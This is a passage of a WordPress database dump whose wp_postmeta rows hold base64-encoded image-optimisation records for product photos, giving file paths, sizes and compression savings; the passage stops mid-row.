INSERT INTO `wp_postmeta` VALUES (28957, 1937, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjIwMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLWdyZWFzZS1vaWwuanBnIiwicmVkdWN0aW9uIjoxMTQyNTUsInRpbWUiOjE0ODM1NTA4NzksImlkIjoiMTkzNyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwODgxLCJpZCI6MTkzN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLWdyZWFzZS1vaWwtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLWdyZWFzZS1vaWwtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLWdyZWFzZS1vaWwtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA4ODQsImlkIjoxOTM3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtZ3JlYXNlLW9pbC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtZ3JlYXNlLW9pbC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1ncGwtZ3JlYXNlLW9pbC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDg4NywiaWQiOjE5Mzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtZ3JlYXNlLW9pbC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA4OTEsImlkIjoxOTM3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtZ3JlYXNlLW9pbC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtZ3JlYXNlLW9pbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1ncGwtZ3JlYXNlLW9pbC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDg5MywiaWQiOjE5Mzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwODk2LCJpZCI6MTkzN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLWdyZWFzZS1vaWwtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLWdyZWFzZS1vaWwtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLWdyZWFzZS1vaWwtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA4OTgsImlkIjoxOTM3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtZ3JlYXNlLW9pbC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtZ3JlYXNlLW9pbC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1ncGwtZ3JlYXNlLW9pbC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDkwMSwiaWQiOjE5Mzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLWdyZWFzZS1vaWwtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLWdyZWFzZS1vaWwtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLWdyZWFzZS1vaWwtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA5MDMsImlkIjoxOTM3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWdwbC1ncmVhc2Utb2lsLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwOTA2LCJpZCI6MTkzN31d'); 
INSERT INTO `wp_postmeta` VALUES (28958, 1936, 'wpfc_optimisation_reduction', '108368'); 
INSERT INTO `wp_postmeta` VALUES (28959, 1936, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLmpwZyIsIndpZHRoIjozMzA1LCJoZWlnaHQiOjIwNDgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwuanBnIiwicmVkdWN0aW9uIjoxMDgzNTgsInRpbWUiOjE0ODM1NTA5MTYsImlkIjoiMTkzNiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwOTE4LCJpZCI6MTkzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwtODAweDQ5Ni5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjQ5NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwtODAweDQ5Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwtODAweDQ5Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA5MjIsImlkIjoxOTM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hZXJvc3BhY2UtZ3JlYXNlLW9pbC03Njh4NDc2LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NDc2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hZXJvc3BhY2UtZ3JlYXNlLW9pbC03Njh4NDc2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1hZXJvc3BhY2UtZ3JlYXNlLW9pbC03Njh4NDc2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDkyNCwiaWQiOjE5MzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTE2MDB4OTkxLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjk5MSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwtMTYwMHg5OTEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTE2MDB4OTkxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDkyOCwiaWQiOjE5MzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwOTMwLCJpZCI6MTkzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA5MzMsImlkIjoxOTM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hZXJvc3BhY2UtZ3JlYXNlLW9pbC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hZXJvc3BhY2UtZ3JlYXNlLW9pbC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1hZXJvc3BhY2UtZ3JlYXNlLW9pbC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDkzNSwiaWQiOjE5MzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWFlcm9zcGFjZS1ncmVhc2Utb2lsLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwOTM4LCJpZCI6MTkzNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hZXJvc3BhY2UtZ3JlYXNlLW9pbC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hZXJvc3BhY2UtZ3JlYXNlLW9pbC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1hZXJvc3BhY2UtZ3JlYXNlLW9pbC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDk0MCwiaWQiOjE5MzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwtNDUweDI3OS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwtNDUweDI3OS5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjI3OSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtYWVyb3NwYWNlLWdyZWFzZS1vaWwtNDUweDI3OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA5NDMsImlkIjoxOTM2fV0='); 
INSERT INTO `wp_postmeta` VALUES (28960, 1935, 'wpfc_optimisation_reduction', '19818'); 
INSERT INTO `wp_postmeta` VALUES (28961, 1935, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEuanBnIiwid2lkdGgiOjU5MDUsImhlaWdodCI6Mzk0MSwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MDk0NywiaWQiOiIxOTM1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjcwMTc1ODExLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjg2MCwidGltZSI6MTQ4MzU1MDk1MCwiaWQiOjE5MzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3MDE3NTgxMS04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzAxNzU4MTEtODAweDUzNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjcwMTc1ODExLTgwMHg1MzQuanBnIiwicmVkdWN0aW9uIjoyNTMxLCJ0aW1lIjoxNDgzNTUwOTU0LCJpZCI6MTkzNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjcwMTc1ODExLTc2OHg1MTMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBo